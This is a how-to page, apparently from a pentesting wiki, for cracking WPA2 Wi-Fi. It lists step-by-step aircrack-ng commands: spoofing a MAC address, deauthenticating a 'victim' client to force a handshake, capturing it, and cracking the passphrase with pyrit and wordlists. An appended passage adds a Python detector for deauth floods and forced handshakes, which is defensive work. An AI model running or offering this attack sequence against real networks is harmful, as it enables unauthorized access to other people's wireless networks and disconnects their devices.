How-To: WPA2 Attacking

Get the network set up

ifconfig wlan0 down
macchanger -m MA:CA:DD:RE:SS wlan0
airmon-ng start wlan0
airodump-ng mon0

Note channel #
Note mac address (BSSID) of AP
airmon-ng stop mon0
airmon-ng start wlan0 6    (channel #)
airodump-ng -c 6 --bssid xx:xx:xx:yy:yy:yy -w blah mon0    (bssid of AP)

(Do not capture just IVs, get all of it! Do not use --output-format ivs)
(Also keep this running, do not turn it off)
(You can also filter by adding --encrypt wpa; this will get only the WPA/WPA2 shit)
aireplay-ng -0 5 -a xx:xx:xx:yy:yy:yy -c vi:ti:ma:ca:dd:rs mon0

(in airodump-ng, look for the "WPA handshake" message in the top right corner)
pyrit -e ap_name create_essid
pyrit -i dictionary.txt import_passwords
pyrit batch
aircrack-ng -w dictionarylist.txt blah-01.cap   (slow; airodump-ng -w blah writes blah-01.cap)

(this is a quick way for checking if you have captured any IV/WPA handshakes)
(for the lazy: aircrack-ng -w dictionarylist.txt *.cap)
Now for speed!
airolib-ng testdb --import essid ap_name

(normal to say "Could not open file/stream for reading.")
pyrit -e ap_name -o testdb export_hashdb

Shit itself: sqlite3.OperationalError: SQL logic error or missing database
I read about a 2 gig file size limit.... Perhaps break up wpa.txt into smaller parts?
So I backed up and used /pentest/passwords/wordlists/darkc0de.lst
No problem with this on HD install.
aircrack-ng -r testdb blah-01.cap  (fuckin fast! 20 seconds!)

also try:
pyrit -r blah.cap -e MyOtherNetwork testdb

To watch for EAPOLs:
tcpdump -ni eth0 -e ether proto 0x888e
tcpdump -r wpa.full.cap -e ether proto 0x888e
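As an added example, not from the original page: a small stand-alone Python monitor that does for raw monitor-mode 802.11 frames what the tcpdump filters above do for EAPOL on eth0, and additionally counts deauthentication frames, so the deauth-burst-then-4-way-handshake pattern that the sequence above produces on the air can be spotted from the defender's side. The frames, MAC addresses and the 8-byte radiotap header are constructed inline, and the flood threshold is an assumed tuning value.

```python
import struct
from collections import Counter

ETHERTYPE_EAPOL = 0x888E
DEAUTH_FLOOD = 5   # deauths between one pair that we treat as a flood (assumed tuning value, not from the page)
RT = b"\x00\x00\x08\x00\x00\x00\x00\x00"   # minimal 8-byte radiotap header used by the constructed frames

def parse_frame(frame):
    """Strip radiotap, then classify: ('deauth', ta, ra), ('eapol', msg, ta, ra) or None."""
    f = frame[struct.unpack_from("<H", frame, 2)[0]:]      # radiotap length is little-endian at offset 2
    ftype, subtype = (f[0] >> 2) & 0x3, f[0] >> 4
    ra, ta = f[4:10].hex(":"), f[10:16].hex(":")           # addr1 = receiver, addr2 = transmitter
    if ftype == 0 and subtype == 12:                       # management / deauthentication
        return ("deauth", ta, ra)
    if ftype == 2:                                         # data; QoS subtypes carry 2 extra header bytes
        body = f[24 + (2 if subtype & 0x8 else 0):]
        if len(body) >= 15 and body[:6] == b"\xaa\xaa\x03\x00\x00\x00" \
                and struct.unpack_from(">H", body, 6)[0] == ETHERTYPE_EAPOL and body[9] == 3:  # EAPOL-Key
            ki = struct.unpack_from(">H", body, 13)[0]     # Key Information: ACK=0x80, MIC=0x100, Secure=0x200
            ack, mic, secure = ki & 0x80, ki & 0x100, ki & 0x200
            msg = 3 if ack and mic else 1 if ack else 4 if mic and secure else 2 if mic else 0
            return ("eapol", msg, ta, ra)
    return None

def analyze(frames):
    """Return ({pair: deauth count} for flooded pairs, {pair: set of EAPOL-Key message numbers})."""
    deauths, msgs = Counter(), {}
    for ev in filter(None, map(parse_frame, frames)):
        pair = tuple(sorted(ev[-2:]))                      # same pair regardless of direction
        if ev[0] == "deauth":
            deauths[pair] += 1
        else:
            msgs.setdefault(pair, set()).add(ev[1])
    return {p: n for p, n in deauths.items() if n >= DEAUTH_FLOOD}, msgs

def forced_handshakes(frames):
    """Pairs deauth-flooded and then seen completing a full 4-way handshake (forced re-association)."""
    floods, msgs = analyze(frames)
    return sorted(p for p in floods if msgs.get(p) == {1, 2, 3, 4})

# Constructed sample capture: 5 deauths AP->client, then the client reconnects and completes the 4-way handshake.
AP, STA = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")
def deauth(ta, ra):    # 24-byte management header + reason code 7
    return RT + b"\xc0\x00\x00\x00" + ra + ta + ta + b"\x00\x00" + b"\x07\x00"
def eapol_key(ta, ra, from_ds, key_info):   # data frame, LLC/SNAP, EAPOL v2 type 3, RSN descriptor
    hdr = RT + bytes([0x08, 0x02 if from_ds else 0x01]) + b"\x00\x00" + ra + ta + AP + b"\x00\x00"
    return hdr + b"\xaa\xaa\x03\x00\x00\x00\x88\x8e" + b"\x02\x03\x00\x5f\x02" + struct.pack(">H", key_info)
SAMPLE = [deauth(AP, STA)] * 5 + [eapol_key(AP, STA, True, 0x008a), eapol_key(STA, AP, False, 0x010a),
                                  eapol_key(AP, STA, True, 0x13ca), eapol_key(STA, AP, False, 0x030a)]
```

Running `forced_handshakes(SAMPLE)` reports the AP/client pair; on a real capture, feed it the frames from the monitor interface (radiotap included) and alert on any pair it returns.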
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License